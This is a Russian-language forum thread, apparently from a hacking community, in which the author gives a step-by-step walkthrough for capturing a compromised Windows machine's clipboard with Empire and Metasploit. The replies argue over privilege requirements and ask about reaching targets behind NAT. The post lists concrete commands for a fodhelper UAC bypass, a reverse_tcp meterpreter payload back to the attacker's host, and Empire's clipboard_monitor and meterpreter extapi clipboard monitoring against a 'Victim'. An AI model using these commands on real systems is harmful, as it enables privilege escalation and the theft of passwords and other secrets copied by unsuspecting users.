Получение информации из буфера обмена Victim

[OneDollar]

Всем привет! Сегодня столкнулся с такой ситуаций, когда нужно взять информацию из буфера обмена Victim. Разобрался и решил создать лайтовую статью для вас, думаю каждому пригодится в арсенале такая фича! Проводить атаку мы будем в kali linux 2017.3, а атаковать будем многострадальный windows server 2012 R2 standart.

Работу выполним в двух фрамеворках:
1. Metasploit со своим незаменимым meterpreter-ом
2. Empire

Что нам для этого понадобится ? Как всегда это получении сессии ( агента ), об этом много статей на форуме, поэтому я не буду описывать этот момент, а просто предоставлю ссылки (если был бы новенький способ, я бы описал!)

Получении сессии в meterpreter и получение агента в empire​

Ну приступим :

Получили мы агента в Empire. Идем в agents и смотрим, есть у нас права админа или нет. В моем случае они есть! Тому подтверждение * слева от названия машины

agents

Переименуем имя чтобы было удобнее с ним работать, далее подключаемся к агенту и проверяем в info чтобы строка high_integrity была заполнена 1, это так же подтверждает что мы имеет права админа.

rename (имя агента текущее) Codeby (новое имя агента)
interact Codeby
info

Видим что все отлично, можно работать ! Если мы получили агента с параметром high_integrity 0, то нужно сделать bypassuac. Пишем :

usemodule privesc/bypassuac +TAB
info
set Listener http(у меня листенер так называется)
run

И выбираем модуль. Советую выбрать bypassuac_fodhelper т.к. сам его узаю. В нем пишем info и обычно заполняем листенера которого создавали для получения агента. Собственно и запускаем run

Все после атаки получаем нового агента со * и подключаемся к нему :

interact (имя)

Ну теперь изи, пишем :

usemodule collection/clipboard_monitor
info

Собственно здесь мы видим такой параметр как PollInterval он нам говорит. Задайте количество секунд, через которое ему чекать изменения в буфере (по дефолту 15 сек). Я выставил 2 секунды, вы смотрите сами.. )

set PollInterval 2
run

Все, теперь после копирования информации у нас в империи появляется текст.

Prof1t

Теперь пришло время для метерпретера. Получили сессию и подключились к ней:

sessions (N) где N номер сессии

И опять же, если сессия получена с правами обычного юзера что мало вероятно, то проделать нужно следующие действия:

background
use exploit/windows/local/bypassuac_fodhelper
set SESSION N (где N номер сессии)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.102 (свои данные)
set LPORT 5900 (свои данные)
run

Отлично, теперь подключимся и проверим права :

sessions N (где N номер сессии)
run post/windows/gather/win_privs

Супер, права админа есть, системы нет, можно работать. Далее подгружаем :

load extapi
help

Видим что данные успешно подгружены, можно работать.

clipboard_monitor_start - начать запоминать
clipboard_get_data - дампануть что есть
clipboard_monitor_stop - остановить

​

P.S. с правами системы это не работает ! Только с правами админа.

Также работа проведена на машине Windows 10 с помощью тех же инструментов, все отлично работает.

На этом у меня все) Всем профит и до новых встреч !)​

 

[Vertigo]

Очень понравилось описание автором ключевых моментов в данной статье без потери сессии:
Модули,которые работают с uac , не теряют своей актуальности,и успех проведения теста сервера во многом от этого зависит.
Великолепно описан обязательный процесс повышения привелегий и возврат к начальному его этапу без потери контроля.
Не лишним будет помнить и о миграции в процесс.
Технично поставлен акцент на правах system.Это очень хорошие привелегии,но в отдельных случаях,как можем убедиться,могут не сработать.В общем,разорил меня автор на +1 балл )),чем с удовольствием и делюсь.

 

[SlipX]

все ясно разжовано и разложено по полочкам, мог бы и сам тыкнул +1 а так только "нравится"

 

[karlomarx]

Допустим я имею Шелл или метерпретер на правах обычного юзера,следовательно миграция требует прав,байпассы требуют прав,тогда в чем смысл?может быть я что то упустил,но не думаю.то есть я сделал это,но прав никак не получил,может быть я в чем то ошибаюсь,но не думаю.Даже на скринах видно что нужно быть в админ группе,что уже означает что некие права имеются.Вообщем я не пойму и на практике это не работает,или же поправьте меня.Естественно я могу получить привилегии через эксплойты вроде мс16-032 и кучу других сивиешек,но хоть убей я не пойму как получить права как в данной статье.Миграция требует прав,байпасс требует админ группу,и это не просто доводы,было опробовано на практике ещё до этой статьи.Тыкните меня носом в чем я не прав.Спасибо

 

[OneDollar]

Допустим я имею Шелл или метерпретер на правах обычного юзера,следовательно миграция требует прав,байпассы требуют прав,тогда в чем смысл?может быть я что то упустил,но не думаю.то есть я сделал это,но прав никак не получил,может быть я в чем то ошибаюсь,но не думаю.Даже на скринах видно что нужно быть в админ группе,что уже означает что некие права имеются.Вообщем я не пойму и на практике это не работает,или же поправьте меня.Естественно я могу получить привилегии через эксплойты вроде мс16-032 и кучу других сивиешек,но хоть убей я не пойму как получить права как в данной статье.Миграция требует прав,байпасс требует админ группу,и это не просто доводы,было опробовано на практике ещё до этой статьи.Тыкните меня носом в чем я не прав.Спасибо

Каких прав требуют байпасы? Главное, что бы ваши права были (администратор). Как Вы их получаете, тут уже не важно. И почему не работает это на практике? Я ежедневно использую данный метод и причем на разных версиях виндовс. Я в статье описал метод получения привилегий админа. Довольно подробно с описанием каждого действия. Предоставьте хотя бы скриншоты с проблемой.. я постараюсь помочь

 

[karlomarx]

Тут опять я не понимаю.Каких прав требуют байпасс,и пишите что нужны права администратора.Потом как бы их снова получаете,понятно что если получить сессию на машину с привилегиями админа,не зная пароля,то да,байпас сработал,получили шелл с админом, делайте что хотите,это все ясно.Но вопрос остаётся,имея админа,я могу провести что хочу.Грубо говоря,в статье не получение прав,а обход uac уже на правах админа,вот и все.То есть для того чтобы сделать все что написано в статье,нужны изначальные привилегии.

 

[OneDollar]

Тут опять я не понимаю.Каких прав требуют байпасс,и пишите что нужны права администратора.Потом как бы их снова получаете,понятно что если получить сессию на машину с привилегиями админа,не зная пароля,то да,байпас сработал,получили шелл с админом, делайте что хотите,это все ясно.Но вопрос остаётся,имея админа,я могу провести что хочу.Грубо говоря,в статье не получение прав,а обход uac уже на правах админа,вот и все.То есть для того чтобы сделать все что написано в статье,нужны изначальные привилегии.

Даже если пользователь запустил файл не от имени админа, то и этого достаточно, чтобы сделать обход UAC и тем самым получить привилегии администратора. При получении сессии уже есть все необходимое чтобы начать работу. Если ваш допустим батник был запущен от админа, то уже ничего не нужно делать. Стоит только подгрузить модуль и запустить. Если от юзера, то сделать bypassuac и все) подгрузить и запустить. Если не понятно, в лс попробую объяснить лично..

 

[FlowLight]

Есть вопрос по поводу получения агента в Empire от целевого пк находящегося за NAT роутера. Пробую на примере metasploit, но не то пальто

 

[OneDollar]

Есть вопрос по поводу получения агента в Empire от целевого пк находящегося за NAT роутера. Пробую на примере metasploit, но не то пальто

Пиши в лс, постараюсь помочь